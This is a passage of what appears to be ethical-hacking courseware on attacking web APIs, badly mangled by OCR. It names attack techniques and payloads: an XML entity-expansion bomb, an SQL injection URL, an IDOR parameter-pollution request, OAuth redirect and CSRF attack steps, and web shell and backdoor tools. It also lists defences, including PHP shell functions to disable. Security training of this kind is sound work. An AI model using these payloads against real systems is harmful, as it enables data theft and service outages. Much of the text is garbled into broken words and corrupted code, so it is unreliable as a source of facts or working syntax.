open-source
‘Vulnerabilities
in
|+
Third-Party
Libraries Avoiding
regular
updates
laws
security
‘many
and relegating fixescan resulti n
security
ical andCountermensores
Mackin ©by E-Comel
Copyright
CCross-origin (CORS)
resource sharing thatenables
is a mechanism
cors
Useof
Improper implementations to
thewebbrowser perform cross-domain requests;
of CORScan cause unintentional
Usingthe “Access-Contral-Allow-Origin―
improper
flaws
headerfor allowing
all
ofiginson privateAPIscan leadto hotlinking
Ifthe inputis not sanitized,
attackersmayuse codeinjection
techniques suchas SALandXSSto addmaliciousSQL statements
Codeinjections fr codeto theinputfieldso n theAPI
Allowattackersto stealcriticalinformationsuchas session cookies
and user credentials.
Privilege
escalationis acommon vulnerability i n APIs
present
RBACPrivilege role-based
hhaving access control
(RBAC)wherechanges to
Escalation
are proper
endpoints madewithout
Allowattackers
attention
to gain access to users’
sensitiveinformation
No proper attribute-basedaccess control(ABAC)validationallows
No ABACValidation attackersto gain unauthorizedaccess to APIobjects
or perform
actionssuchas viewing,updating, or deleting
Logic
Business Flaws Many APIscome withvulnerabilities
exploit
Allowattackersto
purposes
legitimateworkflows
logic
in business
for malicious
APITable164: vlnerbities
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebAPIHacking
Methodology
(©Web-based
APisare
u sed
APIs
more
user
fiendly,
heterogeneous
for supporting devices
suchas mobile
developers
a ndloT
devices,
ontheaspect
these
(©Tommake
theseweb-based are compromising of.
thereby making web-basedservices vulnerable
to varous attack
identi
toto@ —
© vvee sey sandrds
+
Identify
aweb the
Hacking APIinvolvesfollowing
the target
phases:
Detect
=
security
Identify
standards
the attacksurface
=
Launchattacks
ical andCountermensores
Mackin ©by E-Comel
Copyright
the Target
Identify
ure regu
Message
Formats
manipulate
Caneasiy
message
enti
the,
| einen. srt
Identifythe Target
hacking
Before an attackerfirstneedsto identify
an API, thetargetandits perimeter:
HTTP:APIssuchas SOAP
‘=
andREST mostly HTTPprotocol
use the for communicating
API-
basedmessages. The HTTP protocol is a text-basedprotocol
where the header
information format.Forexample,
i s transmittedin a readable considerthe following
HTTPRequest andResponse headers:
HTTPRequest
Rocwpetinagergit
decoptatncediog:
gzip,
tnage
Spon
deflate
Request
Messee
=>
eeuest
H eaderandBody
Blanklineseparating
bockrasTe00¢eauthor=Ra
TPE ese oy
14.87;
Figure
of
ExampleHTTP header
Request
ical andCountermensores
Mackin ©by E-Comel
Copyright
HTTPResponse
ons tontedas
wot-nangeetbytes,
response
Wenders |_
Response
p> Matis
shownin
‘As the figure,
14.8;
Figure
both HTTP Request
ofResponse
Example
HTTP
and Responseheaders
header
are transmittedi n
plaintext;
an attackerc an easily
manipulate
theseheadersto identify
the target.
‘Message
Formats:TheAPI messagestransmittedover the webwill take some format
suchas JSONforREST
API andXMLforSOAP are usedincorrectly,
API. If theseformats
theycan pave the way for vulnerabilities.Astheseformatsare easyto understand,
an
attackercan easily
manipulate encoded
messages to identify
i n theseformats thetarget
andits perimeter.
ical andCountermensores
Mackin ©by E-Comel
Copyright
DetectSecurity
Standards
Inegry transport
though
signature
|G SSLprovides evel secutyfor AP message oensure
though
confidentiality encryption and
|@ these
standardsecurity
standards
configured
impropery,
can in
are
forfortheexploitation
an attacker ier vulerailties these
Detect Security
Standards
Although
APIsclaimto besecureas they
incorporate standards
security suchas OAuthandSSL,
theystill includemanyvulnerabilitiesthat can beexploited byattackers.
=
APIs such as SOAPand RESTimplement different authentication/authorization
standards suchasOpenID Connect, SAML, OAuth1.Xand2.X,andWS-Security.
SSLprovides transport-levelsecurity for API messagesto ensure confidentiality
through
encryption through
and integrity signature.Although SSLis usedfor security,
i n most API
messages, onlysensitive user data suchas creditcarddetailsare encrypted, leaving
otherinformationi n plaintext.
If thesesecurity
standards are configured
improperly, an attackercan identifyvulnerabilities
in
thesestandardsfor further exploitation.
For example, an attackercan capture and reuse a
sessiontokento retrieve a legitimate
user'saccount informationthat is not encrypted.
ical andCountermensores
Mackin ©by E-Comel
Copyright
the AttackSurface
Identify
API
Metadata
Vulnerabilities PresserDet
Sd communion
corde between the
A
fromtherecords
a ie
ical andCountermensores
Mackin ©by E-Comel
Copyright
Definition
Swagger
watnoa: “bauer
summary: "Delet
metrods
anaes
cerety?
type: “void
,
1
paraneters
Is
acesAve
ated? 105
description
required: true,
5d
to deere
type: "string
paranType: "path
Sllownitiple: false
Ora
snuliple? none a?
1489: Example
Figure definion
of swagger
Attackerscan exploit
vulnerabilities
i n these definitionsto perform
various attackson
APIs,
API Discovery: If an API does not have metadata, attackersmonitor and recordthe
communication betweenthe API and an existingclientto identify the initialattack
surface.For example, an attackermay use a mobile app that uses targetthe API,
configure a localproxyfor recording traffic,and finally
configure
the mobiledeviceto
use this proxy to accessthe API.Then, the attackerusesautomatedtoolsto generate
metadatafromthe recordedtraffic.
Brute Force:if none of the abovementioned techniques works, the attackerstry to
identify
the API paths,
arguments, etc.,through brute-forcing. Common API paths used
bydevelopers include api, /api/v2,/apis.json,etc. Furthermore, some APIs such as
hypermedia allow retrieving links and parameters related to an API response.This
informationhelpsattackersto identifythe attacksurface.
ical andCountermensores
Mackin ©by E-Comel
Copyright
LaunchAttacks EH
on Login/credenta Attacks
Stuffing
Maliousinputattacks ‘uthorzation
Attackon APL
S SLConfiguration
Inaecute User Spooting
InsecureDirect References
Object (1008)
Middle
Attacks
‘Man-in-the-
Sesion/Ruthentiaton
Insecure Handing
Replay
Attacks
Session
ED socal
encnesing
Fuzzing
andInvalid InputAttacks
Fuzzing
‘tacks
use thefuzing
to
techniquerepetealysendrandom
inputtothe target
APIt o generate
error
fran, attackers
T eperform
combination
of inputparameters usesepts
that
automated
to achieve the goal
send a huge
numberofequests with a varying
Invalid InputAttacks
tacks
wilinvalid
to
eve
thea inputs APIsuch endingten
of
place ombers, ombersin
place
of
tackersalso theHTTP
manipulate h eaders
andvalues bothAP logica ndHTTP
targeting protocol
Module4 1918
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
MaliciousInputAttacks
CEH
Malicious
Attacks Input —————
XML
Bomb
Code Attack
rtackers
bothan
target ||
injectmaliousinput decty
APLandts hating
to
SECT Ste
thisatack,
attackers
‘perform
rmatious pases singXML
message
use cae
* * rn *
|sbymalicious
seit
‘pt offs,
uploading
uploading
shel
example
document
crt instead
for
ETL
io oe
apatites
etait
ates
‘This themaisous
mayresult in executing
Script
bypass
the
security
to
on mechanisms
Attacks
Injection
noveainramremnrasnry
seo anne han bn
ietetnneane
information
ta perform
other mailous acts on the databaseserver
ical andCountermensores
Mackin ©by E-Comel
Copyright
InsecureConfigurations
Exploiting
Login/Credential
Stuffing
Attacks
(©
Atackers
{©Credentialemploy
attacks
login
suingattacks
or redentilstufingatacs
donot perform
to explopassword
guesingor rute-forlng
pasword
tte stomata the ener ented pats ofeden sng avomoted
reuse across
of passwords ste
o sesuchas eny
—
mult
MBA,an
SNIPRbreak
to i ntoan account
APIDDoSAttacks
&&
o a cam
AuthorizationAttackson API:OAuthAttacks
°
=
(©
OAutnsan authorization
prota tat lows a se imitedaccess tothe resources
to grant on ate to
Ofuth Atacks
(aT
LaunchAttacks ell
Afteridentifying
the targetAPI,analyzing formatsand security
the message standards,
and
identifying attackersperform
the attack surface, various attackson the targetAPI to steal
sensitive information
suchas creditcarddetailsandcredentials,
Module4 1924
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
performed
Variousattacks on APIsare discussed
below:
=
Fuzzing
Attackersuse the fuzzing
technique
to repeatedly
sendsome randominputto the target
API to generate To perform
that revealcriticalinformation.
error messages fuzzing,
attackers use automated scriptsthat send numerous requestswith varying
combinations of inputparameters.Attackersuse toolssuchas Fuzzapi
to perform
on
theAPI
fuzzing target
Invalid InputAttacks
In some scenarios,fuzzing is difficult to perform due to its structure. In suchcases,
attackerswill give invalid inputsto the API,suchas sending text i n placeof numbers,
sending numbersi n placeof text, sending a greater numberof charactersthan
expected, and sending null characters, etc., to extract sensitive informationfrom
unexpected systembehaviorand error messages. At the same time, attackersalso
manipulate the HTTPheaders andvaluestargeting bothAPIlogic andtheHTTPprotocol
InputAttacks
‘Malicious
above,
In the attack discussed attackerstry to retrieve sensitive informationfrom
unexpected systembehavioror error messages. A more dangerous attackis wherethe
attackersinjectmaliciousinput directly to target both the API and its hosting
To perform
infrastructure, attackers
this attack, malicious
employ message
parsersusing
XML.
Thefollowing
codesnippetillustratesa n XML bombattack:
<?xml version="1.0" encoding="utf-8"7>
<!DOCTYPElolz [
<!ENTITY lol "1o1">
<!ENTITY loli
{ENTITY 1012 €lol;
"Glol; £101;
6101; s1o1;E101; £101;
4101;61ol; lol ;">
<!ENTITY «1011;
“gloll ;élo11;61o11;élo11;
1013
1011; E1011; élol1;slol1 ;elol1;">
1012 ;
"glol3
<!ENTITY
;€1013;
61013;
1015
41013; 41013 £1013;
; £1013;41013; 41013 ;¢1013;">
"glo14
;
<!ENTITY 1016 61014;
61014;61014; 61014;61014 ;€1014;
£1014; Glol4 61014; ">
“eloLS
<!ENTITY
;€1015;
61015;
1017
4lo1§;4lol5 ; £1015;61015; Elol5 ;¢lo15;">
£1015;
;
">
Module4 1922
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
<!ENTITY 1019
> ;
"eloL8 61018;61018; 41018 ;¢1o18£1018;
;
£1018;
E1018;E1018; ¢lo18;">
<1o12>61019 ;</lolz>
Whenthe abovementioned codeis processed bya vulnerableor misconfigured
XML
parser,i t will try to expand
the lol9 entity,resulting
i n a memory-out-of-bound
error.
Thiseither brings
the targetserver totallydown or makesit vulnerableto further
attacks
Anotherway in whichattackersperform thisattackis byuploading maliciousscriptfiles,
shell of
e.g, byuploading scriptinsteadthe pdfdocument.
the maliciousscriptto bypass
scriptto otherparties
the securitymechanisms
Thismayresulti n executing
o n the server or propagating
who are tryingto accessthe API. Using this technique
the
attackers,
tryto extract informationrelatedto the underlying
filesystem.
Injection
Attacks
Similarto traditionalweb applications,
APIs are alsovulnerableto various injection
attacks.Forexample, considerthe following
normalURL:
http: //billpay.com/api/vi/cust/459
For the abovementioned
URL,the API retrievesthe customer detailsbasedon the
SQLquery:
ID459fromthedatabaseusing the following
‘customer
*
“SELECTFROMCustomers where custID='― custID +
―
+
Here,
is with
thecustiD replaced 459
custID="
* FROM
“SELECT
459°―
Customers where
In the abovementioned
URL,assume that an attackerinjects
the maliciousinput
http: //billpay.com/api/vi/cust/ "8200r%20'1
SQL
*is
Theresultantmalicious query
“SELECTFROMCustomers where custID="’or ‘1
Theabovementioned query returns detailsof all the customers in the database. Using
an attackermay further deleteor modify
this information, the data i n the databaseor
use thecustomers’
information to perform othermaliciousactivities on the database
‘API to perform
access may allowattackers a n MITM attack.An attackermay
sniff
the
ical andCountermensores
Mackin ©by E-Comel
Copyright
trafficbetweenan APIanda client,manipulate andstart
the client-sidecertificate,
or manipulating
‘monitoring the encrypted
trafficbetweenthe clientandtheAPI,
Insecure DirectObject (IDOR):
References In general,
directobject
referencesa re
Usedas arguments for
API
calls,andaccessrights
API metadataand exploited
not
a re imposed o n the objects
ical andCountermensores
Mackin ©by E-Comel
Copyright
Cobection
f Stl
Credentials
web
Services
Figure14.90:
Hlustration
ofcredential
stffing attack
‘APL
DDoSAttacks
The DDoSattack involvessaturating
a n API with a massive volumeof traffic from
multiple (botnet)
infectedcomputers to delay
the API services to legitimate
users.
Although
many rate limit constraints are implemented
to protectthe server against
crashing,
theymaynot preventthe service delay
(API
response),
thereby
degrading
the
API's
user experience,
Attackersoften carry out theseattacksusingbotnetsthat are createdto discoverand
staywithintheAPIrate limitcontrolto increase the possibility
ofan attack.Alongwith
the regular
trafficfrom legitimate
users,attackers’ can alsobypass
requests APIsecurity
management systems, loadbalancers, implementations.
andother security
Most of these attacksmay not be volumetric,Theymay also exploitcertain API
vulnerabilitiesto disruptthe API services. For instance,
an attackerwho gainsaccess to
the memory
resources
reserved
theAPIcan consume CPUandother
the service for as long for
as possible.
theAPIto delay
Figure
of
14.91:l usration APIDDeSattack
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Authorization
Attackso n API:OAuthAttacks
According to https://auth0.com,
OAuthis an authorizationprotocolthat allowsa user to
resources on one site to anothersite without having
grantlimitedaccess to his/her to
expose
his/her
credentials. devicesand applications,
Auth grantsauthorizationflowsfor many computing suchas
applications
users to different
connecting fromone application
to accessthe required
information.
Differentactors involvedi n the OAuthprocess:
> Ownerof the resource: The resource owner is alsoknownas a user who grants
permission to accesshis/her
to an application
suchas providing
is limitedor conditional, account.
access
The to the application
onlyreadandwrite permissions.
Server(API):
‘Authorization/Resource Theresource server provides
the secureduser
andthe authorizationserver validatesthe user identity
account, andthen supplies
the accesstokento theapplication.
Clientor Application: that seeksaccessto the user account. To
It is an application
the user must authorizethe application;
access the account, then,the AP!should
validatetheauthorization.
Steps
involvedin AuthorizationCodeGrant
Thereare four stepsinvolvedi n the authorizationcodegrant,through
whichattackers
can perform
various authorization
attacks
o n theAPI
The user passesthe GETrequestto the client via the user agentto initiate the
authorizationprocess. Thisoperation can be performed via the “Loginwith or
buttondisplayed
Connect― on the client's
site
Theuser agentc an beredirectedto theauthorizationserver bythe client usingthe
following
parameters:
*
response_type:Codeusedfor informing the server which permissions to
execute
client_id:
1Dassigned
to the client
redirect_uri:
URIwherethe authorization
server redirectsthe user agentwhen
theauthorizationcodeis provided
of to
scope:Definesthe level access the application
State:Opaque valueusedfor securityimplementations.
Thevalue is alsoused
for maintaining
the state betweenrequestandcallback
Whenthe user is authenticatedandauthorizedto accessthe resource, the user
agentis redirectedto redirect_uri
bythe authorizationserver. Theserver uses the
following
*
parameters
do
to this:
Code:Authorizationcode
ical andCountermensores
Mackin ©by E-Comel
Copyright
* State:Valuesupplied
i n the abovementioned
request
© Using the accesstokenbyadding
the authorizationcode,the clientrequests the
following
+
parameters
Authorization_code
grant_type:
of
i n the body a request:
Y_
attacker
The
Usesmake
createsa malicious
logout
CSRF
to
provider.
webpageas follows:
the user on the
Again uses CSRF his/her
to makethe user login
on the provider
using fake
account credentials.
Y-
Spoofs provider
with
the firstrequest
to connect the
just anotherGETrequest. It is usually
account
performed
theclient.It is
insidethe <iframe>tagto
of
this
action.
maketheuser unaware
logged
Oncethe victim opensthe attacker'smaliciouspage,his/her account gets
out on the providerand connects as a fake account. Then,the attacker'sfake
account is connected
with thevictim’s
account on the client.Thevictim does not
as theattackerhasalready
asktheclientfor permission, approved it.
Hence, account on the clientside using
the attackercan loginto the victim’s
his/heron
the
fakeaccount provider.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackon ‘redirect_uri’
the domainis usually
While registering, specified
by the client and onlythose
“redirect_uri―
on the specific
domainare permitted.
If an attackercan identify
vulnerabilities he/she
suchas XSSon a web pageon the client domain, can exploit
themto capture authorizationcode.
Stepsto perform an attackon ‘redirect_uri’
The attackerleaks data througha vulnerablepage on the client domain:
https://xyz.com/vuln
on the page;then,the pagesendsthe
attackerinstallsmaliciousJavaScript
‘The
URL,whichis loadedi n the
theattacker browser
with and to
(along the parameterfragments)
attackercreatesa pagethatprompts
‘The the user to opena maliciouslink:
https://provider.com/oauth/authorize?client_id=CLIENTID&respons
th_code&redirect_uri=https%3A%2F%2Fxy2.com%2Fvuln
Whenthe victim opens the maliciouslink,the user agentis redirectedto
https://xyz.com/vuln?code=CODE,
andthe CODEis then exfiltratedto the
attacker
Now,the attackeruses the retrievedcode to provide
the access token via
suchas https://xyz.com/oauth/callbback?code=CO
authentic‘redirect_uri’
SRF on Authorization
Response
Theattackerperforms attackto connect a fakeaccount on the provider
a CSRF with
the victim’s
authorization
code client
side. a
account on the
grant,
Thisattackexploits third requestrelatedto
‘Steps
to perform
CSRFon authorizationresponse:
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Now,the attackercan signi n as the victim o n theclientbylogging
i n with his/her
fakeaccount on the provider
TokenReusage
Access
OAuth requires unique access tokensfor individualclients.It ensures that these
tokenssavedon the authorization server are mapped to relevantscopes and time
expiry.Accesstokensprovided for “ClientA― Attackersexploit
can workfor “ClientB―.
to perform
this feature attackso n clientsthatallowgrants implicitly
Steps
The
access
to reuse tokens:
attackerdevelops
a legitimate “clientA―
clientapplication andenrollsit with
some provider
Now,the attackerluresthe victim into accessing and gainsillegal
“clientA―
accessto the victim’s
accesstokenon “clientA―
Therefore,
Theattackeris verifiedas a validentityby“client―. one accesstoken
is sufficient
using
foruseon manyclients the
implicit
grant.
ical andCountermensores
Mackin ©by E-Comel
Copyright
OtherTechniques
to Hack an API
Asn
the
reves
Engineering
Reverse
oder |
Atachrsime
chuneatedweve usage
los esi intheAta cane
User
Spoofing
Engingering nome
Other Techniques
to Hack an API
Different
waysto hacka n API are discussed
below:
Reverse Engineering
Viewing the APIsfromthe developer's viewpointcan beflawedbecauseit checksonlyif
a n API is workingas intended. Onceit is deployed fortheend-user experience,it may
not work as it worked i n the developer environment. This is what attackersoften
attempt to dowhile reverse-engineering the API.AttackersinvokeAPIsi n reverse order
to identify theflawsresidingin theAPIthat can beobfuscated i n real-timeusage.
an anflow
Forinstance, consider orderis madeusing the same account that is already
earlierbooking.
Theorder appears
to besomething
like
usedfor
this:
Ordermade
©
©
Order linkedwiththe account
Orderis accepted
Attackerscan use thisflow i n the processof reverse engineeringan API. If the accepting
mechanism is carriedin the reverse order,the internalAPIusedto connect ordersto
accountscan be crashed, thereby forcing
the browserto exposethe account detailsof a
user.
UserSpoofing
It is a the original
processof concealing identityandmasquerading as some othervalid
most cases,the attackertries to exposehimselfa s a legitimate
entity.In user with
special
privileges
and provides free data access to additional users to cause more
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackers
damage. fromphishing
use detailsobtained leaking
or any otherinformation
as
the
methodsto masqueradeoriginal
user.
Although
it maynot bea directAPI attack, through
socialengineeringcan beperformed
the API,Socialengineeringdoesnot affecttheAPIor the machinecode;itis a technique
‘employed
to trick users into divulgingtheir credentialsor other sensitive information
Phishingis a technique oftenusedto sendmaliciouslinksto usersvia emailto reset or
validate their securitycredentials.Spear-phishing is another sophisticated social
engineeringattack in whichadditionaldata is provided to the users,making them
believethat they with a validendpoint.
a re interacting
ical andCountermensores
Mackin ©by E-Comel
Copyright
RESTAPIVulnerability
Scanning
AM
(@REST une
Caltial data
intraduce
ik
theftandintermediate
data
that
Brokento
AF,
detect
that
Ata lems attaches
authenieson,
ESTA ae were
andSesion management
[REST
Seaning
3a
Toole
APIVatnerabity
enc wf
OMS?240 wacars.
RESTAPI Vulnerability
Scanning
REST API vulnerabilities
introduce the same risksas securityi ssuesi n webapplications and
websites.Theserisksincludecriticaldata theft,intermediatedata tampering, etc. Performing
thorough
exploit.
scanningon REST APIscan
Attackerscan use toolssuchas Astra,
API vulnerability
scanning,
expose
various underlying
Fuzzapi,
W3ef, andAppspider that
vulnerabilities attackerscan
to carryout REST
=
Astra
Source:https://github.com
Attackersuse the Astratool to detectand exploit underlying
vulnerabilitiesi n a REST
API. Astra can discoverand test authentications suchloginandlogout; thisfeature
makesi t easyfor attackersto incorporate it into the CICDpipeline.
Astracan invokeAPI
collectionasan inputvalue; hence,it can alsobe usedfor scanning RESTAPIs.
Astraallowsattackersto detectRESTAPIsthat are vulnerable
to attackssuchas XSS,
SQL injection,information leakage, CSRF, broken authentication and session
management, JWTAttack, blindXXEinjection,
CRLFdetection,CORS misconfiguration,
andrate limiting.
ical andCountermensores
Mackin ©by E-Comel
Copyright
14:2: Screenshotof stra
Figure
APIvulnerability
SomeREST toolsare as follows:
scanning
*
(https://github.com)
Fuzzapi
+
wBaf(http://docs.w3af.org)
=
appspider
(https://www-rapid7.com)
Voki (https://www.vegabird.com)
OWASP ZAP(https://www.owasp.org)
Module4 1922
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
IDORvia ParameterPollution
Bypassing
|G: nsecure decobjetreference
data
abject
dtabaee
keys,
directories,
fs,canbe
exploited
by
thatarses when developers
sa wunerablity
(1DOR) disclose
references
to
atackr
modify
references
and
gain
acces
Internal enforcement suchas andother that
an to the unauthoriced to data
fr example, consider
thisnormal
eques
spi ays. com/profiie/aser_4d= 321
butunique
repeatedlywith
values.
Forinstance,assumethat the victim’s is 321.Attackerscan change
user_id this user_id
valueto
654 (it is anotheruser_idvalue) to identify
IDOR.If the page is not vulnerableto IDOR, it
generates a “401
Unauthorized―
error message.
To bypass IDORvia parameter pollution,
the attackersendstwo user_id parameters as a
request, i n whichone parameter is appended user_id
with the victim’s andthe other one is
appended withthe attacker's
own user_id.
Forexample,
considerthe following
request:
api xyz.con/profile/user_id= 321
Theattackermanipulates
the abovementioned pollution
requestusing parameter to bypass
IDOR
api xyz con/profile/user_id=654cuser_id=321
Whenthe abovementionedrequesti s processed at the REST API endpoint,
the application
verifiesthe first user_id
parameter and ensures that the user who is sending
the requesthas
included
his/her own user_Id
in the GETrequest,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Hence, IDORbyproviding
an attackercan bypass two user_id one belongs
parameters: to the
victim andtheother
validrequest. belongs
to the attacker.Theapplication
is trickedinto to considering
it as
a
Attackersuse toolssuchas Burp Suiteto proxythe trafficand intercept all the traffic to REST
API endpoints. Then,theyuse the parameter pollution technique to sendboththe attacker's
user_id user_id
andthe victim’s in the GETrequest to gain unauthorizedaccessand retrieve
sensitive datafromthe victim’s
account. Usingthis technique, attackerscan alsocompromise
the application'sfunctionality
becauseeveryparameterinsidethe application is vulnerable to
thisattack.
Figure of
Burp
14.93:Screenshot Sute
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebShells
languages
thenaccessor
‘Aweb
sellsa malicouspce ofcodeor scriptthats developed server-side
using Such
as PMPASP,
RUBY,
PERL, andPythonandae stale ona target eerer
‘The
malicious atackers to gan
septenables remote capablitis
emote administration t othe tage
As—
Web Shells
‘Awebshelli s amalicious pieceofcodeor scriptthat is developed usingserver-side languages
suchas PHP, ASP, PERL, RUBY, and Python,
andtheninstalledon a targetserver. Themalicious
scriptenables attackers to gain remote accessor remoteadministration capabilities over the
targetserver along with its file system,
Attackersinjectmaliciousscripts byexploiting
most common vulnerabilitiessuchas remote file
inclusion(RFI), localfile inclusion(LF),expositionof administrationinterfaces, and SQL
Attackerscan also perform
injection, XSSattacksusing socialengineering techniques to install
themalicious
code.
Attackersalsoemploy networkmonitoring tools (mainly Wireshark)to discovervulnerabilities
that can be exploited later for web shell injection.Thesevulnerabilitiesoften lie i n a web
server'ssoftware or content management system (CMS).
Webshellsare usedbythe attackerto carryout privilege escalationandgainremote accessto
download, upload,erase, and execute files on the targetweb server. Using the web shell,
attackersc an alsostealprivatedata,damage thewebsite’s via DDoS
reputation attacks,
change
the structure of the website, makethe web page's resources unavailableon the Internet,
exfiltratedata,ete
maintain persistence,
ical andCountermensores
Mackin ©by E-Comel
Copyright
14.94:
Figure thstrationofa webshel
ical
Mackin
and ©by CountermensoresCopyright
E-Comel
WebShellTools
ical andCountermensores
Mackin ©by E-Comel
Copyright
14.95:
Figure Screenshot
ofWSOPhp
W ebshell
Someadditionalwebshelltoolsare as follows:
=
b374k(https://github.com)
=
99 (https://github.com)
=
Chopper
China (https://www.fireeye.com)
R57(https://github.com)
PouyaASPWebShell(https://github.com)
Module4 1929
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
BackdoorAccessvia WebShell
Gaining
srcers
(G
exploit non-validatedi l e uploads
to inject
malicious srt webserver
na arget
| wetals
Weevely
backoor
acces
without
being
\e-Aacers suchas toga to a web traced
halos
attackers
Weve ato
spreading
backdoors
acrosthe targetnetwork
i n performing aminstrtve tats, maintaining and
persistence,
being
traced,
Weevely
=
Source:https://github.com
use Weevely
‘Attackers to develop a backdoorshelland upload it to a targetserver to
gain remote shellaccess. Thistool alsohelpsattackersi n performing administrative
tasks,maintaining
persistence,andspreadingbackdoors acrossthe targetnetwork.
ical andCountermensores
Mackin ©by E-Comel
Copyright
14.96:ScreenshotofWeevely
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to PreventInstallationof aWebShell
ering atin
Performregular
vulnerability
scansto detectthe areas of threatsusinganyweb security
software
Deploy
firewallso n thewebserver to monitor andcontrolthenetworktrafficbasedo n
the security
rules
Deactivate directory
browsing
i n the webserver to preventdirectory
traversalattacks
Regularly
audit the accountsand review the group permissionsto preventthe
a
installationof webshellfromtheweb server to theinternalnetwork
Disableall unusedand risky
PHPfunctionssuchas exec(),
shell_exect),
show_sourcet),
proc_open(), passthru(),
andpentl_exec()
ical andCountermensores
Mackin ©by E-Comel
Copyright
Use escapeshellarg()and escapeshellemd()
to ensure that the user inputsare not
injected
into the shellcommands
to avoidcommand execution vulnerabilities
Ensurethat all the web applications
usingupload
forms are secure and permitonlythe
whitelistedfilestypes
‘Avoid
usingcodefromuntrustedwebsitesor onlineforums
Do not install unnecessary third-party
plugins
and regularly
checkand update
the
plugins
used
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebShellDetectionTools
CEH
‘Web
Shell Detector
(©
Web
shell
Detectors
Pythor-based
a PHO/
script
that asst in
a nddiscovering
scanning
holeeipen/sp/arpsels
‘Web
Shell Detection Tools
© oo t/ha
com)
Web Shell Detection Tools
Attackers
try vulnerabilities
often to discover
targetthe web servers. Then,
i n an application
or web page,through whichthey
theyexploitthosevulnerabilitiesto installbackdoorsvia web
to remote
shells gain
suchattacks, access andperform
it is mandatory
professionals
maliciousoperationson the target
to carry out regular
use tools suchas WebShellDetector,
server. To prevent
web shell or backdoorscanning. Security
NetworkSecurity,
Firefye and NeoPIto
detectthesewebshellson the targetservers.
=
WebShellDetector
Source:https://www.shelldetector.com
php/cei(perl)/asp/aspx
discovering
script
WebShellDetectori s a PHP/Python-based that helps
shells.It has a web shellssignature
the webshell―.
anddiscovering
i n scanning
databasethat helpsi n
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebShellDetectorv1.62
Someweb shelldetection
toolsare listedbelow:
Firetye NetworkSecurity
(https://www
fireeye.com)
=
NeoPI(https://github.com)
=
AntiShellWebShellHunter (http://antishell.com)
Astra(https://www.getastra.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
SecureAPIArchitecture
‘Apts
ace latest
vulnerable
Cyberattacks
t othe andmostsophistiated
de tovarioussecurity
flawsinduced
by90
ae
T osafeguard
a
As fromthese attacks,secu professionals
anddevelopers
nee tocreatesecure AParchitecture,
‘ective
security andmitigation
strategies, plies
drastic ae 7
&
etet al
possible attacks
AP
gateways
provide
many
security
capitis
ein
security
and
contol andauthenticationtheAPL
intgity,auatmanagement,
“=
~~
SecureAPI Architecture
APLis a popular
technology
that actsas a gateway
forcommunication andintegrates
different
applications
usingthe web.API is widely
employed
due to its advancedtechniques
and its use
oftheprevailing
transparency.
infrastructure.
To safeguard API fromtheseattacks,
to
itis vulnerable the latestandsophisticated
to various securityflaws induced by poor programmingpractices
security
cyber-attacks due
and also due to its
professionalsanddevelopers need
to establisha secure APIarchitecture, effectivesecuritystrategies, andmitigationpolicies.
API architectureis built using an API gateway consisting of firewallsthat work as a server to
controlthe trafficand detectall possible attacks.Executing the securitypolicy for the API
securityarchitectureis achievedbyisolating the API implementation and API security into
differentlayers.Theselayers emphasize thattheAPI design andAPI securityperform different
rolesthat require a differentfieldof expertise. It focuseso n the logicalseparationof concerns,
whereone emphasizes the knowledge
Undera secure API architecture,
of
solving
the rightproblem
the API developerfocuses
at the right
time.
ical andCountermensores
Mackin ©by E-Comel
Copyright
capabilities
and controlsto admin,suchas access control,
the API security threatdetection,
confidentiality, audit management,
integrity, authentication,
messagevalidation,
and rate
of
all
limiting theAPIspublished
bytheorganization
Enterprise
Network
—
Devices
_Integrations
Cloud
‘Mobile api
API Clients
Driven
ical andCountermensores
Mackin ©by E-Comel
Copyright
APISecurity
RisksandSolutions
Level Scrutinizetheimplementation
‘Authorization
Implement a robust
unpredictable object
IDvalues
oftheauthorization
access controlpolicy
policies
for randomand,
‘Pos
Exposure
Lackof
and
Resources
Scrutinizethedataflowfromtheendpoint
Ensureappropriate
UseOWASP
rate-limiting
controls
to theclient
a re i n place
AutomatedThreat Handbookas a knowledge source
RateLimiting for preventing
botsfrom consumingyour resources
ical andCountermensores
Mackin ©by E-Comel
Copyright
BrokenFunction Avoid function-level
authorization
Level Usesimple andstandard authorizationand enablethedefault
Authorization settingto deny
Mass Do not exposethe internalvariableor object names as inputs
Assignment Ensurewhitelistng that the clientcan update
of all the properties
PerformhardeningprocessagainstAPIcontinuously
Security Usescanningtoolsand humanreviews to examine the entire API
Misconfiguration misconfigurations
stackfor security
inputvalidationandwhitelisting
Perform
Implement interface
a parameterized for processinginboundAPI
Injection requests
Ensurethat the filtering
logiclimitsthenumberof records
returned
ofal AP environmentsincluding,
Maintainproper inventory
production, testing,anddevelopment
staging,
Improper
Assets
‘Management standardizinga of
functionsall
review
Conductsecurity
APIs, mainly
focusing
on
a
Create risklevelranking
functions
of theAPIsandimprovethesecurity
a higher
for APIshaving risklevel
Insufficient
Logging and
Use
standard
response
Regularly
logging
activities
formatforall the APIsthat support
i n allphases
monitor alltheAPIendpoints of
incident
‘Monitoring
production, testing,anddevelopment
staging,
Table 165: Top1 0APISecuryR isks
OWASP andSolutions
ical andCountermensores
Mackin ©by E-Comel
Copyright
BestPracticesforAPI Security
Use
server
gunerated
a8 tokens embededn
HTML en andict el sear sessment ec ate
Usecate
of
what
Employ
ifr vet It sta Pade cht orc ated narmton
made
bys
wthins
pater
tine
“
that
ut cla
Open
Cannel
nee 20Sate Okth2 and
Doptoten
user input
Use an optimized firewall to ensure that all the unused,unnecessary
files and
permissive rulesare revoked
to
UseIP whitelisting create a list of trustedIP addresses
to limit the accessto onlytrustedusers or components
to accessAPIsand
or IP ranges
time
particular frame
Maintainand monitor accesslogs
regularly
to helpin detecting
anomaliesand to take
measures i n the future
precautionary
Implementa pagination technique that can dividea single
